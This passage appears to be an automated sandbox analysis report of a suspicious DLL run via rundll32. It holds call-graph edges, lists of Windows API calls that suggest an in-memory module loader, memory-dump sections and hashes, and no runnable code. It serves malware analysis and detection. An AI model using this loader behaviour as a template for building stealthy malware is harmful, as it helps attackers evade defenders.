100025ac 21194->21198 21196 10002560 21195->21196 21197 10002567 21195->21197 21196->21200 21197->21192 21199 100025b4 VirtualAlloc 21198->21199 21198->21200 21199->21200 21200->21181 21202 10002ae9 IsBadReadPtr 21201->21202 21211 10002adf 21201->21211 21204 10002b13 21202->21204 21202->21211 21205 10002b45 SetLastError 21204->21205 21206 10002b59 21204->21206 21204->21211 21205->21211 21221 100023c0 VirtualQuery VirtualFree VirtualAlloc 21206->21221 21208 10002b73 21209 10002b7f SetLastError 21208->21209 21212 10002ba9 21208->21212 21209->21211 21211->21186 21214 100027c0 21211->21214 21212->21211 21213 10002cb9 SetLastError 21212->21213 21213->21211 21215 10002808 21214->21215 21216 10002911 21215->21216 21218 100028ed 21215->21218 21222 10002690 21215->21222 21217 10002690 2 API calls 21216->21217 21217->21218 21218->21185 21220->21180 21221->21208 21223 100026ac 21222->21223 21228 100026a2 21222->21228 21225 10002714 VirtualProtect 21223->21225 21226 100026ba 21223->21226 21225->21228 21227 100026f2 VirtualFree 21226->21227 21226->21228 21227->21228 21228->21215 21229 10024d50 21234 1002b0bb 21229->21234 21231 10024d82 21233 10024d5f 21233->21231 21245 1002acfb 21233->21245 21237 1002b0c7 __EH_prolog3 21234->21237 21236 1002b115 21272 1002ac8f EnterCriticalSection 21236->21272 21237->21236 21253 1002aec4 TlsAlloc 21237->21253 21257 1002adac EnterCriticalSection 21237->21257 21279 10023b5b 78 API calls 3 library calls 21237->21279 21242 1002b13b std::_Locinfo::~_Locinfo 21242->21233 21243 1002b128 21280 1002af6b 88 API calls 4 library calls 21243->21280 21246 1002ad07 __EH_prolog3_catch 21245->21246 21247 1002ad30 std::_Locinfo::~_Locinfo 21246->21247 21288 1002a6ab 21246->21288 21247->21233 21249 1002ad16 21250 1002ad23 21249->21250 21298 10024d0b 21249->21298 21301 1002a71d 79 API calls ~_Task_impl 21250->21301 21254 1002aef0 21253->21254 21255 1002aef5 InitializeCriticalSection 21253->21255 21281 10023b23 78 API calls 3 library calls 21254->21281 21255->21237 21262 1002adcf 21257->21262 21258 1002ae8e _memset 21259 1002aea5 LeaveCriticalSection 21258->21259 21259->21237 21260 1002ae08 21282 10023778 21260->21282 21261 1002ae1d GlobalHandle GlobalUnlock 21264 10023778 codecvt 80 API calls 21261->21264 21262->21258 21262->21260 21262->21261 21266 1002ae3b GlobalReAlloc 21264->21266 21267 1002ae47 21266->21267 21268 1002ae6e GlobalLock 21267->21268 21269 1002ae52 GlobalHandle GlobalLock 21267->21269 21270 1002ae60 LeaveCriticalSection 21267->21270 21268->21258 21269->21270 21286 10023b23 78 API calls 3 library calls 21270->21286 21273 1002acd1 LeaveCriticalSection 21272->21273 21274 1002acaa 21272->21274 21276 1002acda 21273->21276 21274->21273 21275 1002acaf TlsGetValue 21274->21275 21275->21273 21277 1002acbb 21275->21277 21276->21242 21276->21243 21277->21273 21278 1002acc0 LeaveCriticalSection 21277->21278 21278->21276 21279->21237 21280->21242 21281->21255 21283 1002378d codecvt 21282->21283 21284 1002379a GlobalAlloc 21283->21284 21287 10001650 80 API calls codecvt 21283->21287 21284->21267 21286->21268 21287->21284 21289 1002a6c0 21288->21289 21290 1002a6bb 21288->21290 21292 1002a6ce 21289->21292 21303 1002a687 InitializeCriticalSection 21289->21303 21302 10023b5b 78 API calls 3 library calls 21290->21302 21294 1002a6e0 EnterCriticalSection 21292->21294 21295 1002a70a EnterCriticalSection 21292->21295 21296 1002a6ff LeaveCriticalSection 21294->21296 21297 1002a6ec InitializeCriticalSection 21294->21297 21295->21249 21296->21295 21297->21296 21304 10024bd0 21298->21304 21300 10024d17 21300->21250 21301->21247 21302->21289 21303->21292 21305 10024bdc __EH_prolog3_catch 21304->21305 21324 1001e8f0 21305->21324 21311 10024c76 21333 1002ac5c 79 API calls codecvt 21311->21333 21313 10024c85 21314 10024c97 21313->21314 21334 100248e2 117 API calls 2 library calls 21313->21334 21335 1002ac5c 79 API calls codecvt 21314->21335 21317 10024caa 21318 10024cbc 21317->21318 21336 10024b06 117 API calls 2 library calls 21317->21336 21337 1002ac5c 79 API calls codecvt 21318->21337 21321 10024cd0 21323 10024ce2 std::_Locinfo::~_Locinfo 21321->21323 21338 10024b89 117 API calls 2 library calls 21321->21338 21323->21300 21325 1001e8fe 21324->21325 21327 1001e921 21325->21327 21339 10001650 80 API calls codecvt 21325->21339 21328 1001ed40 21327->21328 21329 1001ed82 21328->21329 21330 1001ed76 21328->21330 21332 10020421 67 API calls _malloc 21329->21332 21340 1001f370 21330->21340 21332->21311 21333->21313 21334->21314 21335->21317 21336->21318 21337->21321 21338->21323 21339->21325 21341 1001f38f 21340->21341 21342 1001f3ab 21341->21342 21345 1001f3b9 21341->21345 21347 1001fb60 21342->21347 21344 1001f3b7 21344->21329 21345->21344 21355 1001fc30 80 API calls 21345->21355 21348 1001fb8e 21347->21348 21356 100236ce 21348->21356 21351 1001fbb1 21361 1002e804 68 API calls 3 library calls 21351->21361 21353 1001fbeb 21353->21344 21355->21344 21357 100236e2 21356->21357 21358 1001fba3 21356->21358 21359 1002e654 _malloc 67 API calls 21357->21359 21358->21351 21360 1001fb50 80 API calls codecvt 21358->21360 21359->21358 21360->21351 21361->21353 21362 1002eaac 21363 1002eab7 21362->21363 21364 1002eabc 21362->21364 21380 1003732f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21363->21380 21368 1002e9b6 21364->21368 21367 1002eaca 21370 1002e9c2 _raise 21368->21370 21369 1002ea0f 21378 1002ea5f _raise 21369->21378 21428 10008080 21369->21428 21370->21369 21370->21378 21381 1002e881 21370->21381 21378->21367 21380->21364 21382 1002e890 21381->21382 21383 1002e90c 21381->21383 21433 10035645 HeapCreate 21382->21433 21385 1002e943 21383->21385 21390 1002e912 21383->21390 21386 1002e948 21385->21386 21387 1002e9a1 21385->21387 21552 1003459f 8 API calls __decode_pointer 21386->21552 21396 1002e89b 21387->21396 21583 100348b9 79 API calls 2 library calls 21387->21583 21391 1002e92d 21390->21391 21390->21396 21548 10030912 67 API calls _doexit 21390->21548 21391->21396 21549 10036caa 68 API calls __read_nolock 21391->21549 21393 1002e94d 21553 100351f3 21393->21553 21396->21369 21398 1002e8a7 __RTC_Initialize 21401 1002e8ab 21398->21401 21407 1002e8b7 GetCommandLineA 21398->21407 21545 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21401->21545 21402 1002e937 21550 100345d3 70 API calls 2 library calls 21402->21550 21406 1002e93c 21551 10035675 VirtualFree HeapFree HeapFree HeapDestroy 21406->21551 21469 1003702b 21407->21469 21413 1002e8d1 21416 1002e8d5 21413->21416 21511 10036f70 21413->21511 21414 1002e995 21570 1002e577 21414->21570 21415 1002e97e 21569 10034610 67 API calls 5 library calls 21415->21569 21546 100345d3 70 API calls 2 library calls 21416->21546 21421 1002e985 GetCurrentThreadId 21421->21396 21423 1002e8f5 21423->21396 21547 10036caa 68 API calls __read_nolock 21423->21547 21699 1001ffa0 21428->21699 21434 1002e896 21433->21434 21434->21396 21435 10034927 GetModuleHandleW 21434->21435 21436 10034942 21435->21436 21437 1003493b 21435->21437 21439 10034aaa 21436->21439 21440 1003494c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21436->21440 21584 1003065c Sleep GetModuleHandleW 21437->21584 21600 100345d3 70 API calls 2 library calls 21439->21600 21441 10034995 TlsAlloc 21440->21441 21445 10034aaf 21441->21445 21446 100349e3 TlsSetValue 21441->21446 21443 10034941 21443->21436 21445->21398 21446->21445 21447 100349f4 21446->21447 21585 10030921 7 API calls 4 library calls 21447->21585 21449 100349f9 21586 100344a9 TlsGetValue 21449->21586 21452 100344a9 __encode_pointer 7 API calls 21453 10034a14 21452->21453 21454 100344a9 __encode_pointer 7 API calls 21453->21454 21455 10034a24 21454->21455 21456 100344a9 __encode_pointer 7 API calls 21455->21456 21457 10034a34 21456->21457 21598 100356e9 InitializeCriticalSectionAndSpinCount __mtinitlocknum 21457->21598 21459 10034a41 21459->21439 21460 10034524 __decode_pointer 6 API calls 21459->21460 21461 10034a55 21460->21461 21461->21439 21462 100351f3 __calloc_crt 67 API calls 21461->21462 21463 10034a6e 21462->21463 21463->21439 21464 10034524 __decode_pointer 6 API calls 21463->21464 21465 10034a88 21464->21465 21465->21439 21466 10034a8f 21465->21466 21599 10034610 67 API calls 5 library calls 21466->21599 21468 10034a97 GetCurrentThreadId 21468->21445 21470 10037049 GetEnvironmentStringsW 21469->21470 21474 10037068 21469->21474 21471 10037051 21470->21471 21472 1003705d GetLastError 21470->21472 21476 10037093 WideCharToMultiByte 21471->21476 21477 10037084 GetEnvironmentStringsW 21471->21477 21472->21474 21473 10037101 21475 1003710a GetEnvironmentStrings 21473->21475 21478 1002e8c7 21473->21478 21474->21471 21474->21473 21475->21478 21479 1003711a 21475->21479 21482 100370c7 21476->21482 21483 100370f6 FreeEnvironmentStringsW 21476->21483 21477->21476 21477->21478 21496 10036a56 21478->21496 21603 100351ae 67 API calls _malloc 21479->21603 21602 100351ae 67 API calls _malloc 21482->21602 21483->21478 21486 10037134 21489 10037147 21486->21489 21490 1003713b FreeEnvironmentStringsA 21486->21490 21487 100370cd 21487->21483 21488 100370d5 WideCharToMultiByte 21487->21488 21491 100370e7 21488->21491 21495 100370ef 21488->21495 21604 1002db20 __VEC_memcpy 21489->21604 21490->21478 21493 1002e577 __read_nolock 67 API calls 21491->21493 21493->21495 21494 10037151 FreeEnvironmentStringsA 21494->21478 21495->21483 21605 10030e38 21496->21605 21498 10036a62 GetStartupInfoA 21499 100351f3 __calloc_crt 67 API calls 21498->21499 21506 10036a83 21499->21506 21500 10036ca1 _raise 21500->21413 21501 10036c1e GetStdHandle 21505 10036be8 21501->21505 21502 10036c83 SetHandleCount 21502->21500 21503 100351f3 __calloc_crt 67 API calls 21503->21506 21504 10036c30 GetFileType 21504->21505 21505->21500 21505->21501 21505->21502 21505->21504 21607 100386ab InitializeCriticalSectionAndSpinCount _raise 21505->21607 21506->21500 21506->21503 21506->21505 21508 10036b6b 21506->21508 21507 10036b94 GetFileType 21507->21508 21508->21500 21508->21505 21508->21507 21606 100386ab InitializeCriticalSectionAndSpinCount _raise 21508->21606 21512 10036f85 21511->21512 21513 10036f8a GetModuleFileNameA 21511->21513 21614 100334dc 111 API calls __setmbcp 21512->21614 21514 10036fb1 21513->21514 21608 10036dd6 21514->21608 21518 1002e8e1 21518->21423 21524 10036cf8 21518->21524 21519 10036fed 21615 100351ae 67 API calls _malloc 21519->21615 21521 10036ff3 21521->21518 21522 10036dd6 _parse_cmdline 77 API calls 21521->21522 21523 1003700d 21522->21523 21523->21518 21525 10036d01 21524->21525 21528 10036d06 _strlen 21524->21528 21617 100334dc 111 API calls __setmbcp 21525->21617 21526 1002e8ea 21526->21423 21539 1003074b 21526->21539 21528->21526 21529 100351f3 __calloc_crt 67 API calls 21528->21529 21533 10036d3b _strlen 21529->21533 21530 10036d99 21531 1002e577 __read_nolock 67 API calls 21530->21531 21531->21526 21532 100351f3 __calloc_crt 67 API calls 21532->21533 21533->21526 21533->21530 21533->21532 21534 10036dbf 21533->21534 21537 10036d80 21533->21537 21618 1003096f 67 API calls _vscan_fn 21533->21618 21535 1002e577 __read_nolock 67 API calls 21534->21535 21535->21526 21537->21533 21619 10032cb9 10 API calls 3 library calls 21537->21619 21540 10030759 __IsNonwritableInCurrentImage 21539->21540 21620 1003817c 21540->21620 21542 10030777 __initterm_e 21544 10030796 __IsNonwritableInCurrentImage __initterm 21542->21544 21624 1002e391 21542->21624 21544->21423 21545->21396 21546->21401 21547->21416 21548->21391 21549->21402 21550->21406 21551->21396 21552->21393 21555 100351fc 21553->21555 21556 1002e959 21555->21556 21557 1003521a Sleep 21555->21557 21677 1003b872 21555->21677 21556->21396 21559 10034524 TlsGetValue 21556->21559 21558 1003522f 21557->21558 21558->21555 21558->21556 21560 1003455d GetModuleHandleW 21559->21560 21561 1003453c 21559->21561 21563 10034578 GetProcAddress 21560->21563 21564 1003456d 21560->21564 21561->21560 21562 10034546 TlsGetValue 21561->21562 21568 10034551 21562->21568 21566 1002e977 21563->21566 21695 1003065c Sleep GetModuleHandleW 21564->21695 21566->21414 21566->21415 21567 10034573 21567->21563 21567->21566 21568->21560 21568->21566 21569->21421 21571 1002e583 _raise 21570->21571 21572 1002e5c2 21571->21572 21573 1002e5fc __dosmaperr _raise 21571->21573 21575 10035865 __lock 65 API calls 21571->21575 21572->21573 21574 1002e5d7 RtlFreeHeap 21572->21574 21573->21396 21574->21573 21576 1002e5e9 21574->21576 21577 1002e59a ___sbh_find_block 21575->21577 21698 10030d24 67 API calls __getptd_noexit 21576->21698 21580 1002e5b4 21577->21580 21696 100358c8 VirtualFree VirtualFree HeapFree __shift 21577->21696 21579 1002e5ee GetLastError 21579->21573 21697 1002e5cd LeaveCriticalSection _doexit 21580->21697 21583->21396 21584->21443 21585->21449 21587 100344e2 GetModuleHandleW 21586->21587 21588 100344c1 21586->21588 21589 100344f2 21587->21589 21590 100344fd GetProcAddress 21587->21590 21588->21587 21591 100344cb TlsGetValue 21588->21591 21601 1003065c Sleep GetModuleHandleW 21589->21601 21597 100344da 21590->21597 21596 100344d6 21591->21596 21593 100344f8 21593->21590 21594 10034515 21593->21594 21594->21452 21595 1003450d RtlEncodePointer 21595->21594 21596->21587 21596->21597 21597->21594 21597->21595 21598->21459 21599->21468 21600->21445 21601->21593 21602->21487 21603->21486 21604->21494 21605->21498 21606->21508 21607->21505 21610 10036df5 21608->21610 21612 10036e62 21610->21612 21616 10031907 77 API calls x_ismbbtype_l 21610->21616 21611 10036f60 21611->21518 21611->21519 21612->21611 21613 10031907 77 API calls _parse_cmdline 21612->21613 21613->21612 21614->21513 21615->21521 21616->21610 21617->21528 21618->21533 21619->21537 21621 10038182 21620->21621 21622 100344a9 __encode_pointer 7 API calls 21621->21622 21623 1003819a 21621->21623 21622->21621 21623->21542 21627 1002e355 21624->21627 21626 1002e39e 21626->21544 21628 1002e361 _raise 21627->21628 21635 100306f8 21628->21635 21634 1002e382 _raise 21634->21626 21661 10035865 21635->21661 21637 1002e366 21638 1002e26a 21637->21638 21639 10034524 __decode_pointer 6 API calls 21638->21639 21640 1002e27e 21639->21640 21641 10034524 __decode_pointer 6 API calls 21640->21641 21642 1002e28e 21641->21642 21653 1002e311 21642->21653 21670 100317be 68 API calls 5 library calls 21642->21670 21644 1002e2ac 21647 1002e2d6 21644->21647 21648 1002e2c7 21644->21648 21657 1002e2f8 21644->21657 21645 100344a9 __encode_pointer 7 API calls 21646 1002e306 21645->21646 21649 100344a9 __encode_pointer 7 API calls 21646->21649 21651 1002e2d0 21647->21651 21647->21653 21671 1003523f 74 API calls _realloc 21648->21671 21649->21653 21651->21647 21655 1002e2ec 21651->21655 21672 1003523f 74 API calls _realloc 21651->21672 21658 1002e38b 21653->21658 21654 1002e2e6 21654->21653 21654->21655 21656 100344a9 __encode_pointer 7 API calls 21655->21656 21656->21657 21657->21645 21673 10030701 21658->21673 21662 1003587a 21661->21662 21663 1003588d EnterCriticalSection 21661->21663 21668 100357a2 67 API calls 8 library calls 21662->21668 21663->21637 21665 10035880 21665->21663 21669 1003068c 67 API calls 3 library calls 21665->21669 21667 1003588c 21667->21663 21668->21665 21669->21667 21670->21644 21671->21651 21672->21654 21676 1003578b LeaveCriticalSection 21673->21676 21675 1002e390 21675->21634 21676->21675 21678 1003b87e _raise 21677->21678 21679 1003b896 21678->21679 21682 1003b8b5 _memset 21678->21682 21690 10030d24 67 API calls __getptd_noexit 21679->21690 21681 1003b89b 21691 10032de1 6 API calls 2 library calls 21681->21691 21684 1003b927 RtlAllocateHeap 21682->21684 21686 10035865 __lock 66 API calls 21682->21686 21687 1003b8ab _raise 21682->21687 21692 10036077 5 API calls 2 library calls 21682->21692 21693 1003b96e LeaveCriticalSection _doexit 21682->21693 21694 1003654f 6 API calls __decode_pointer 21682->21694 21684->21682 21686->21682 21687->21555 21690->21681 21692->21682 21693->21682 21694->21682 21695->21567 21696->21580 21697->21572 21698->21579 21700 1001ffdf _strlen 21699->21700 21714 1001f0b0 21700->21714 21702 10020056 ___DllMainCRTStartup 21705 10020305 21702->21705 21723 10001920 69 API calls 4 library calls 21702->21723 21704 10020326 21719 1001f970 21704->21719 21705->21704 21724 1001f830 69 API calls ___DllMainCRTStartup 21705->21724 21709 10008000 21710 1002e654 _malloc 67 API calls 21709->21710 21711 10008010 21710->21711 21712 1000801c 21711->21712 21713 1002e577 __read_nolock 67 API calls 21711->21713 21713->21712 21725 1001f910 21714->21725 21717 1001f148 21717->21702 21720 1001f995 21719->21720 21721 1000809c 21719->21721 21731 10044028 LeaveCriticalSection std::ios_base::_Addstd 21720->21731 21721->21709 21723->21705 21724->21704 21726 1001f93d 21725->21726 21727 1001f0ed 21725->21727 21730 1004401f EnterCriticalSection std::_Lockit::_Lockit 21726->21730 21727->21717 21729 1001ea80 69 API calls std::ios_base::_Init 21727->21729 21729->21717 21730->21727 21731->21721

                                                                                                          Executed Functions

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 7 10002d40-10002d67 call 100024a0 10 10002d70-10002d81 7->10 11 10002d69-10002d6b 7->11 13 10002d83-10002d90 SetLastError 10->13 14 10002d95-10002db0 call 100024a0 10->14 12 1000315a-1000315d 11->12 13->12 17 10002db2-10002db4 14->17 18 10002db9-10002dce 14->18 17->12 19 10002dd0-10002ddd SetLastError 18->19 20 10002de2-10002def 18->20 19->12 21 10002df1-10002dfe SetLastError 20->21 22 10002e03-10002e0c 20->22 21->12 23 10002e20-10002e41 22->23 24 10002e0e-10002e1b SetLastError 22->24 25 10002e55-10002e5f 23->25 24->12 26 10002e61-10002e68 25->26 27 10002e97-10002ed2 GetNativeSystemInfo 25->27 30 10002e78-10002e84 26->30 31 10002e6a-10002e76 26->31 28 10002ed4-10002ee1 SetLastError 27->28 29 10002ee6-10002f05 VirtualAlloc 27->29 28->12 33 10002f32-10002f4a GetProcessHeap HeapAlloc 29->33 34 10002f07-10002f21 VirtualAlloc 29->34 32 10002e87-10002e8d 30->32 31->32 35 10002e95 32->35 36 10002e8f-10002e92 32->36 38 10002f6c-10002fd0 call 100024a0 33->38 39 10002f4c-10002f67 VirtualFree SetLastError 33->39 34->33 37 10002f23-10002f2d SetLastError 34->37 35->25 36->35 37->12 43 10002fd2 38->43 44 10002fdc-10003041 VirtualAlloc call 10002320 call 100024d0 38->44 39->12 45 1000314c-10003158 call 10003310 43->45 52 10003043 44->52 53 1000304d-1000305e 44->53 45->12 52->45 54 10003060-10003076 call 100029c0 53->54 55 10003078-1000307b 53->55 57 10003082-10003090 call 10002ab0 54->57 55->57 61 10003092 57->61 62 1000309c-100030aa call 100027c0 57->62 61->45 65 100030b6-100030c4 call 10002940 62->65 66 100030ac 62->66 69 100030c6 65->69 70 100030cd-100030d6 65->70 66->45 69->45 71 100030d8-100030df 70->71 72 1000313d-10003140 70->72 73 100030e1-10003102 71->73 74 1000312a-10003138 71->74 75 10003147-1000314a 72->75 77 10003106-1000310d 73->77 76 1000313b 74->76 75->12 75->45 76->75 78 1000311e-10003128 77->78 79 1000310f-1000311a SetLastError 77->79 78->76 79->45
                                                                                                          APIs
                                                                                                            • Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1
                                                                                                          • SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
                                                                                                          • Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
                                                                                                          • Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
                                                                                                          • GlobalHandle.KERNEL32(02D80630), ref: 1002AE1E
                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
                                                                                                          • GlobalHandle.KERNEL32(02D80630), ref: 1002AE53
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE5A
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
                                                                                                          • GlobalLock.KERNEL32 ref: 1002AE6F
                                                                                                          • _memset.LIBCMT ref: 1002AE89
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 496899490-0
                                                                                                          • Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
                                                                                                          • Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
                                                                                                          • Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __lock.LIBCMT ref: 1002E595
                                                                                                            • Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
                                                                                                            • Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
                                                                                                            • Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F
                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002E5A0
                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002E5AF
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
                                                                                                          • GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714421763-0
                                                                                                          • Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
                                                                                                          • Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
                                                                                                          • Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 131 100036a0-100036bb call 1002e654 133 100036c0-100036e5 131->133 135 10003896-100038b1 133->135 136 100036eb-10003891 133->136 138 100038b7-10004a34 135->138 139 10004a39-10004a3d 135->139
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 100036BB
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 501242067-2694261586
                                                                                                          • Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
                                                                                                          • Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
                                                                                                          • Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
